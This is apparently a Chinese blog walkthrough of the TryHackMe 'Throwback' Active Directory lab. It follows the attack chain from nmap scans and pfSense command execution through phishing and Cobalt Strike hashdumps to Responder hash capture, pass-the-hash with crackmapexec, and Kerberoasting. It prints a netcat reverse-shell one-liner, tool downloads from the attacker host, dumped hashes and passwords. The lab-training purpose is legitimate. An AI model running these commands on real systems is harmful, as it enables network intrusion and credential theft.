THM-throwback靶场
2022-6-26 17:36:14 Author: mp.weixin.qq.com(查看原文) 阅读量:18 收藏

专业水文0.0.最近玩靶场的过程。

本文是根据他的整体的提示跟要求来的

拓扑图

nmap -sV -sC -p- -v 10.200.34.0/24 --min-rate 5000

这个整个c段的探测会比较慢,可以根据他的提示ip先扫描一下主要的ip

THROWBACK-PROD

[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.219Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 15:44 CSTNmap scan report for 10.200.34.219Host is up (0.23s latency).Not shown: 65524 filtered tcp ports (no-response)PORT      STATE SERVICE       VERSION22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)| ssh-hostkey: |   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)|   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)|_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)80/tcp    open  http          Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Throwback Hacks135/tcp   open  msrpc         Microsoft Windows RPC139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn445/tcp   open  tcpwrapped3389/tcp  open  ms-wbt-server Microsoft Terminal Services| rdp-ntlm-info: |   Target_Name: THROWBACK|   NetBIOS_Domain_Name: THROWBACK|   NetBIOS_Computer_Name: THROWBACK-PROD|   DNS_Domain_Name: THROWBACK.local|   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local|   DNS_Tree_Name: THROWBACK.local|   Product_Version: 10.0.17763|_  System_Time: 2022-06-20T07:52:46+00:00| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local| Not valid before: 2022-06-09T18:26:41|_Not valid after:  2022-12-09T18:26:41|_ssl-date: 2022-06-20T07:53:29+00:00; 0s from scanner time.5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Service Unavailable|_http-server-header: Microsoft-HTTPAPI/2.05985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049667/tcp open  msrpc         Microsoft Windows RPC49669/tcp open  msrpc         Microsoft Windows RPC49679/tcp open  msrpc         Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:| smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required| smb2-time: | date: 2022-06-20T07:52:52|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 564.81 seconds

THROWBACK-FW01

[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.138Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 16:01 CSTNmap scan report for 10.200.34.138Host is up (0.23s latency).Not shown: 65531 filtered tcp ports (no-response)PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)| ssh-hostkey: |_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)53/tcp  open  domain   (generic dns response: REFUSED)80/tcp  open  http     nginx|_http-title: Did not follow redirect to https://10.200.34.138/443/tcp open  ssl/http nginx|_http-title: pfSense - Login| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate| Subject Alternative Name: DNS:pfSense-5f099cf870c18| Not valid before: 2020-07-11T11:05:28|_Not valid after:  2021-08-13T11:05:281 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port53-TCP:V=7.92%I=7%D=6/20%Time=62B02ABA%P=x86_64-apple-darwin21.1.0%SF:r(DNSVersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 514.95 seconds THROWBACK-MAIL[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.232Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 15:56 CSTNmap scan report for 10.200.34.232Host is up (0.24s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 7e:de:bb:07:2d:61:6e:0a:a5:7a:f4:39:4b:67:71:ea (RSA)| 256 80:02:7e:d5:10:81:3e:3b:6a:28:c7:0f:36:91:16:62 (ECDSA)|_ 256 f7:fb:92:85:ad:d0:d2:5d:13:02:48:6a:45:00:c3:cb (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))| http-title: Throwback Hacks - Login|_Requested resource was src/login.php|_http-server-header: Apache/2.4.29 (Ubuntu)143/tcp open imap Dovecot imapd (Ubuntu)| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal| Not valid before: 2020-07-25T15:51:57|_Not valid after: 2030-07-23T15:51:57|_ssl-date: TLS randomness does not represent time|_imap-capabilities: more LOGIN-REFERRALS OK have post-login Pre-login listed LITERAL+ SASL-IR LOGINDISABLEDA0001 STARTTLS capabilities ENABLE IDLE IMAP4rev1 ID993/tcp open ssl/imap Dovecot imapd (Ubuntu)| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal| Not valid before: 2020-07-25T15:51:57|_Not valid after: 2030-07-23T15:51:57|_ssl-date: TLS randomness does not represent time|_imap-capabilities: more LOGIN-REFERRALS OK have Pre-login post-login LITERAL+ SASL-IR listed AUTH=PLAINA0001 capabilities ENABLE IDLE IMAP4rev1 IDService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1683.78 seconds

根据得到的信息先回答问题

信息收集

域名:THROWBACK.local

Web1:http://10.200.34.219 公司网站

根据网页信息获取成员架构:

Summers Winters CEO & FounderJeff Davies     CFOHugh Gongo      CTORikka Foxx      Lead Developer

 Great Britain

 Phone: +00 151515

 Email: [email protected]

Web2: https://10.200.34.138/ pfSense

google 相关信息

得到参考链接:https://pfschina.org/wp/?p=408

成功登陆

https://10.200.34.138/diag_command.php 该页面可以执行命令已经php代码

还有一个页面可以直接添加sshkey直接登陆root的

Web3: http://10.200.34.232/src/login.php mail服务

存在一个默认的guset用户

用户名:tbhguest
:WelcomeTBH1!


相关信息收集

发件人:[email protected]
flag:TBH{xxxxx0677}
常用联系人
"J Blaire", "Nana Daiba", "J Davies"
存在邮件内容有升级vul的
VulnerabilitiesUpdate.exe

常见联系人列表



有存在flag

根据我们所获的信息我们可以尝试ssh,rdp,mail等的爆破、或者是联系人邮箱钓鱼等。或者是搞定THROWBACK-FW01再做进一步的信息收集以及利用。不过目前最直接的还是THROWBACK-FW01

THROWBACK-FW01反弹shell

官网的文档提示是我们要使用php反弹。

php方式

系统是:FreeBSD THROWBACK-FW01.THROWBACK.local 11.3-STABLE FreeBSD 11.3-STABLE #

命令反弹方式

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.50.31.71 2233 >/tmp/f

用户:root 无需提权

在FreeBSD下默认的密码文件为 /etc/master.passwd

root:*LOCKED*$2y$10$q81moODbYy1KXoLJxIoc1uXlpBKeSCiieaKiNxjPqTLmNZY3n/Fga:0:0::0:0:Charlie &:/root:/bin/shtoor:*:0:0::0:0:Bourne-again Superuser:/root:daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologinoperator:*:2:5::0:0:System &:/:/usr/sbin/nologinbin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologintty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologinkmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologingames:*:7:13::0:0:Games pseudo-user:/:/usr/sbin/nologinnews:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologinman:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologinsshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologinsmmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologinmailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologinbind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologinunbound:*:59:59::0:0:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologinproxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologinuucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucicopop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologinauditdistd:*:78:77::0:0:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologinwww:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin_ypldap:*:160:160::0:0:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologinhast:*:845:845::0:0:HAST unprivileged user:/var/empty:/usr/sbin/nologinnobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin_relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologindhcpd:*:136:136::0:0:ISC DHCP daemon:/nonexistent:/usr/sbin/nologinadmin:$2y$10$q81moODbYy1KXoLJxIoc1uXlpBKeSCiieaKiNxjPqTLmNZY3n/Fga:0:0::0:0:System Administrator:/root:/etc/rc.initialec2-user:$2$10$zae.EdVMDyWWVJGAQEOtdO7fTAp.6BWOeFnSYf7qV45rjsnKg0DEC:2000:65534::0:0:EC2 User:/home/ec2-user:/bin/tcsh

Flag:#

cat /root/root.txtTBH{b6xxxxxxxxxxxx749}

查看/var/log目录

在系统日志文件目录中还存在一个flag

# cat /var/log/flag.txtTBH{c9xxxxxxxxx4484}

还有一个是login.log 也不是默认的文件

# cat /var/log/login.logLast Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364  解密为(securitycenter)

THROWBACK-mail

利用burp爆破。提供了一份密码

Summer2020Management2020Management2018Password2020<company>2020 这里的意思是根据公司名称自定义Password123

邮箱搜索查看

找到一个找回密码相关邮件

伪造邮件钓鱼

使用我们收到的漏洞修复文件模版发送

成功上线一台主机

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::BlaireJ:1001:aad3b435b51404eeaad3b435b51404ee:c374ecb7c2ccac1df3a82bce4f80bb5b:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1002:aad3b435b51404eeaad3b435b51404ee:50527b4bfe81a64edf00e6b05c26c195:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0a06b1381599f2c8c8bfdbee39edbe1c:::


beacon> shell arp -a[*] Tasked beacon to run: arp -a[+] host called home, sent: 37 bytes[+] received output:
Interface: 10.200.34.222 --- 0x3 Internet Address Physical Address Type 10.200.34.1 02-b3-3b-92-e6-9b dynamic 10.200.34.117 02-00-30-dc-78-4d dynamic 10.200.34.219 02-b2-be-02-a1-4d dynamic 10.200.34.232 02-06-ee-e4-a7-f7 dynamic 10.200.34.255 ff-ff-ff-ff-ff-ff static 169.254.169.254 02-b3-3b-92-e6-9b dynamic 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.251 01-00-5e-00-00-fb static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static THROWBACK-PROD

responder

文档上说需要访问10.200.34.232后会记录ip然后才能获取到LLMNR.我在macos上测试了不知道为什么获取不到(搞别的靶场的时候获取到过的。可能是后来重装的问题?)。使用它的内置攻击机测试

sudo responder -I tun0 -v

[SMB] NTLMv2-SSP Client   : 10.200.34.219[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:253bcb8412a13048:23AE2B14DA34122CF64139274B9A0CDF:0101000000000000C0653150DE09D2012B4CFCA96E37E129000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000020000039B59080B8031B8B8CEB50610689DAABB665891F5D1740D7C7CF5B3B00753C6F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00330031002E00370031000000000000000000[SMB] NTLMv2-SSP Client   : 10.200.34.219[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:e8720d62b334d299:ADCCA8CCF0C3C3F04A37E318E43F8E68:0101000000000000C0653150DE09D201DC5BAB792677D2DD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000020000039B59080B8031B8B8CEB50610689DAABB665891F5D1740D7C7CF5B3B00753C6F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00330031002E00370031000000000000000000

hashcat

可以本地跑也可以白嫖google colab去解密

PETERSJ::THROWBACK:253bcb8412a13048:23ae2b14da34122cf64139274b9a0cdf:0101000000000000c0653150de09d2012b4cfca96e37e129000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000000000000020000039b59080b8031b8b8ceb50610689daabb665891f5d1740d7c7cf5b3b00753c6f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00350030002e00330031002e00370031000000000000000000:Throwback317

连接ssh

throwback\[email protected] C:\Users\petersj>PowerShell.exe -ExecutionPolicy Bypass                                                       Windows PowerShell                                                                                                                             Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                                                                                                                                     PS C:\Users\petersj> 
PS C:\temp> wget http://10.50.31.71:8080/Ghostpack-CompiledBinaries/Seatbelt.exe -o 2.exe

权限提升

./2.exe CredEnum

发现一个账号存在在管理中

runas /savecred /user:admin-petersj /profile "cmd.exe"

成功提权到system

上线cs

用命令获取flag

dir /s user.txtdir /s root.txt

获取hash

我这里使用的是cs直接获取。。

[+] received password hashes:admin-petersj:1010:aad3b435b51404eeaad3b435b51404ee:74fb0a2ee8a066b1e372475dcbc121c5:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:a06e58d15a2585235d18598788b8147a:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1009:aad3b435b51404eeaad3b435b51404ee:fe2acb5ea93988befc849a6981e0526a:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

获取登陆密码

..........* Username : BlaireJ* Domain   : THROWBACK* Password : (null)  kerberos :           * Username : BlaireJ* Domain   : THROWBACK.LOCAL* Password : 7eQgx6YzxgG3vC45t5k9...........* Username : admin-petersj* Domain   : Login* Password : SinonFTW123!            [00000002]* Username : THROWBACK-PROD\admin-petersj* Domain   : THROWBACK-PROD\admin-petersj* Password : SinonFTW123!............

内网

主机探测扫描

load OnlineIP10.200.34.0/24 is Valid CIDRIPCound: 256Scan Start: 2022-06-20 22:39:23
[+] received output:10.200.34.110.200.34.7910.200.34.11710.200.34.1310.200.34.11810.200.34.17610.200.34.21910.200.34.22210.200.34.232=============================================OnlinePC:9Cidr Scan Finished!End: 2022-06-20 22:40:41

[*] Ladon 10.200.34.0/24 PortScan[+] host called home, sent: 407641 bytes[+] received output:Ladon 9.1.4 for Cobalt StrikeStart: 2022-06-20 22:43:12PC Name: THROWBACK-WS01 Lang: en-USRuntime: .net 4.0 ME: x64 OS: x64
[+] received output:OS Name: Microsoft Windows 10 Pro
[+] received output:Machine Make: XenRunUser: BlaireJ PR: *IsAdminPriv: SeImpersonatePrivilegeEnabledPID: 1028 CurrentProcess: rundll32FreeSpace: Disk C:\ 33785 MB
load PortScan10.200.34.0/24 is Valid CIDRIPCound: 256Scan Start: 2022-06-20 22:43:14
[+] received output:PCname: 10.200.34.117 THROWBACK-DC0110.200.34.117 139 Open -> Banner: Windows Netbios10.200.34.117 389 Open -> Default is LDAP 10.200.34.117 445 Open -> Default is SMB 10.200.34.117 636 Open 10.200.34.117 5985 Open -> Banner: Win Winrm10.200.34.117 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.117 88 Open -> Default is Kerberos WebTitle: http://10.200.34.117:80 -> IIS Windows ServerWebBanner: http://10.200.34.117:80 -> Microsoft-IIS/10.010.200.34.117 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 21 Jun 2022 05:43:38 GMT Connection: close10.200.34.117 135 Open -> Default is WMI 10.200.34.117 3389 Open -> Default is RDP
[+] received output:10.200.34.138 22 Open -> Banner: SSH-2.0-OpenSSH_7.510.200.34.138 443 Open -> Banner: HTTP/1.1 400 Bad Request Server: nginx Date: Tue, 21 Jun 2022 05:43:43 GMT Content-Type: text/html Content-Length: 150 Connection: close10.200.34.138 80 Open -> Banner: HTTP/1.1 400 Bad Request Server: nginx Date: Tue, 21 Jun 2022 05:43:43 GMT Content-Type: text/html Content-Length: 150 Connection: closePCname: 10.200.34.222 THROWBACK-WS01.THROWBACK.local10.200.34.222 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.222 445 Open -> Default is SMB 10.200.34.222 139 Open -> Banner: Windows Netbios10.200.34.222 5985 Open -> Banner: Win Winrm
[+] received output:10.200.34.222 135 Open -> Default is WMI 10.200.34.222 3389 Open -> Default is RDP
[+] received output:PCname: 10.200.34.176 THROWBACK-TIMEPCname: 10.200.34.219 THROWBACK-PROD10.200.34.219 445 Open -> Default is SMB 10.200.34.176 445 Open -> Default is SMB 10.200.34.176 139 Open -> Banner: Windows Netbios10.200.34.219 139 Open -> Banner: Windows Netbios10.200.34.219 5357 Open -> Banner: Win7 Microsoft-HTTPAPI10.200.34.219 5985 Open -> Banner: Win Winrm10.200.34.176 5985 Open -> Banner: Win Winrm10.200.34.219 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.7WebTitle: http://10.200.34.219:80 -> Throwback HacksWebBanner: http://10.200.34.219:80 -> Microsoft-IIS/10.010.200.34.219 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 21 Jun 2022 05:43:53 GMT Connection: close10.200.34.176 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.176 443 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:53 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close CWebTitle: http://10.200.34.176:80 -> Throwback Hacks TimekeepWebBanner: http://10.200.34.176:80 -> Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.3110.200.34.176 80 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:53 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close C
[+] received output:10.200.34.176 135 Open -> Default is WMI 10.200.34.219 135 Open -> Default is WMI 10.200.34.176 3306 Open -> Default is Mysql 10.200.34.176 3389 Open -> Default is RDP 10.200.34.219 3389 Open -> Default is RDP
[+] received output:10.200.34.232 22 Open -> Banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.310.200.34.232 143 Open -> Default is IMAP -> Banner: * OK Waiting for authentication process to respond.. -> Hex: (2A204F4B2057616974696E6720666F722061757468656E7469636174696F6E2070726F6365737320746F20726573706F6E642E2E0D0A)=============================================OnlinePC:7Cidr Scan Finished!End: 2022-06-20 22:43:5710.200.34.232 993 Open -> Default is IMAPS WebTitle: http://10.200.34.232:80 -> Throwback Hacks - LoginWebBanner: http://10.200.34.232:80 -> Apache/2.4.29 (Ubuntu)10.200.34.232 80 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:58 GMT Server: Apache/2.4.29 (Ubuntu) Connection: close Content-Type: text/html; charset=iso-8859-1

无法访问内网web,所以要做代理

代理

使用cs设置scoks4a代理(本文是按照课程要求做的,所以没使用mac终端设置)

mac下也可以使用一下命令设置终端代理

export  all_proxy=socks4://127.0.0.1:3306

成功访问

THROWBACK-TIME

Web

结合email 账号MurphyF Summer2020邮件的找回密码连接

http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD

可以构造任意用户密码找回。这里我就没绑定hosts

提示是可以上传Upload Timesheet.xlsm 的宏文件

mac 没装软件 通过windows 台式制作宏

成功上线 不知道会不会掉线 所以注入设置了一下转发上线注入到winlogin.exe 中

抓去hash备用

Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::  keeperoftimeWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

mysql

根据提示在数据中也有一个flag

方式1将cs派生给msf。去执行mysql

use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost 10.50.31.71set lport 7788run

选择 foreign 类型的监听进行 Spawn,填写 MSF 的 IP 和监听端口

方式2 简单粗暴的去上大马

方式3 proxychains 代理/或者ssh

上面的信息收集的是开放的mysql3306端口的

方式4 直接使用shell manager 软件的sock代理功能

define('DB_SRV', 'localhost');define('DB_PASSWD', "SuperSecretPassword!");define('DB_USER', 'TBH');define('DB_NAME', 'timekeepusers');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());}?>

获取域控

crackmapexec

proxychains4 cme smb 10.200.34.0/24 -d THROWBACK -u ~/Downloads/user.txt -p ~/Downloads/pass.txt 2>1 | grep \+

官方给的是利用任务10中的hash 去传递(因为我的cme报错 [-] Connection Error: The NETBIOS connection with the remote host timed out.所以识别了一下grep了smb关键字)

proxychains crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>proxychains4 cme smb 10.200.34.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>1 | grep "SMB"proxychains4 cme smb 10.200.34.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364 2>1 | grep "SMB"

测试出两个用户BlaireJ、HumphreyW状态是ok

Bloodhound

可以利用cs去上传文件或者执行命令。

也可以利用我们收集到的信息去登陆

[email protected]  ~/Downloads  proxychains4 ssh "blairej"@10.200.34.222 [proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.222:22  ...  OKThe authenticity of host '10.200.34.222 (10.200.34.222)' can't be established.ED25519 key fingerprint is SHA256:eZtAKLuTEhhz2sLQeUaf9bA+S9fMhVljqdlRdIsk9Hw.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.200.34.222' (ED25519) to the list of known hosts.[email protected]'s password: Microsoft Windows [Version 10.0.19041.388](c) 2020 Microsoft Corporation. All rights reserved.                                                    PS C:\Users\BlaireJ> Import-Module .\SharpHound.ps1PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip-----------------------------------------------Initializing SharpHound at 1:02 AM on 6/22/2022-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain THROWBACK.LOCAL using path CN=Schema,CN=Configuration,DC=THROWBACK,DC=LOCALPS C:\Users\BlaireJ> [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDSStatus: 0 objects finished (+0) -- Using 77 MB RAMStatus: 151 objects finished (+151 37.75)/s -- Using 88 MB RAMEnumeration finished in 00:00:04.8533233Compressing data to C:\Users\BlaireJ\20220622010214_loot.zipYou can upload this file directly to the UI
SharpHound Enumeration Completed at 1:02 AM on 6/22/2022! Happy Graphing!

本来打算使用exe程序的可是一直有问题,后台改用ps脚本了.需要注意的是用ps导出的文件需要BloodHound<=4.0.3

GetUserSPNs

[email protected]  ~/Downloads  proxychains4 GetUserSPNs.py -dc-ip 10.200.34.117 THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9 -request [proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 10.50.31.74:996 ... 10.200.34.117:389 ... OKServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ------------------------------------------- ---------- -------- -------------------------- -------------------------- ----------TB-ADMIN-DC/SQLService.THROWBACK.local:6792 SQLService 2020-07-27 23:20:08.552650 2020-07-27 23:26:43.628665
[-] CCache file is not found. Skipping...[proxychains] Strict chain ... 10.50.31.74:996 ... 10.200.34.117:88 ... OK[proxychains] Strict chain ... 10.50.31.74:996 ... 10.200.34.117:88 ... OK[proxychains] Strict chain ... 10.50.31.74:996 ... 10.200.34.117:88 ... OK$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$77e0317a5d961420b1b891151aa0c781$74f5aabe443307b8fc7fb4d8859830214e7cd954cb51dd6e53c0b5c93dc7c4d120f354f657d95ed644745083b4011c29a8be2dc3dc45ac6bcd3e438270665fceebe4004afb096217690c244423cbb3deeab57c6da724068db483b7137902f6f0d36ffc3547910c574014c9f8008e14b2ef3561530d71a5005f8a65bedcacedba5dff02b5499dec6e0179ebe96f5c1399ec49b3ed0d92936804900725d0cfdff46f7140bb43884cf20c2c70d2ae00c474699c4d4c8e72982ef2deb9e855650472ba713b4ef0ef7ba2f6bd3802826d5dd75bf4af560629594ee807a0d49cb16b12b43364773d6dcd9437163b0bfb77dac1ed8848aa0d1fc4bd710069f9c46812542acb01bc6a0a5a71eb0dc1af16181fcd5ce559d1e540a33d4ad5936c3217b3a4e08f93c7eb8823ce76d2f9e578a3d56a2926f03689d3ffb562c91889605c781a51aa12b15d707d959aa10f5e4371a054b8dd4c2d2e91ca545ef9e15876b227fef0bc4473fbfa0fa7b0e87662e987edffefd6da3708438f108dfde61b08e715400687b673ac1ab6ebaf49c877e72f66b2387e5cebbfb70a7b3c22356bed6ff11b741be5bef82bddd80a61b6cab93c9f20ed7b8dfaa53aa80fe63314b4f94c78150b2d86b85e6c088988152bea69b0b11297dfc0300e459a428b7ae501ca4d0d36ec8ce855ad366802994c43d9da8fbb134065c104b0a9bb456f5acc200882e851c6e8e630bf622fcdf541f9cdc5f38b18b3d1be6cc4744f39bfbc6c66ca44a22d850b7c2186fdd629dd9c67d6af7837d87ea5f751548b68e47b13145cec902369054971db14731efc00d34bb16b7523c3084e72f03d20db79492acb030c566f32cd5299bb19d3475db74c33603b76009f4d8873cf290c67460f638c69767d6518d3fa1653a6c6365e53632dbec371647e35bc741cc95beafa776e4cb99dcb695ecfc74e963aa27ffd4564dbf431387ccc3f118757354c51e65ee4d0091728417cd8a6c836971d4bae5ccc9185377f96aa8e4de6a0a0fcb49a1f020fdd1a7298c8668a2c157bc235c9881d61a1f94b294428eca22c0f5e95a26fdfc7e94ae75a6cc8f6a3c8d1be125e20588067664a9931b844cde9bbd3fbbf03afecee0635f31dce4b2c81135ef0f3d51364f7daf0e9968335f26e5847de0e4b2a3c60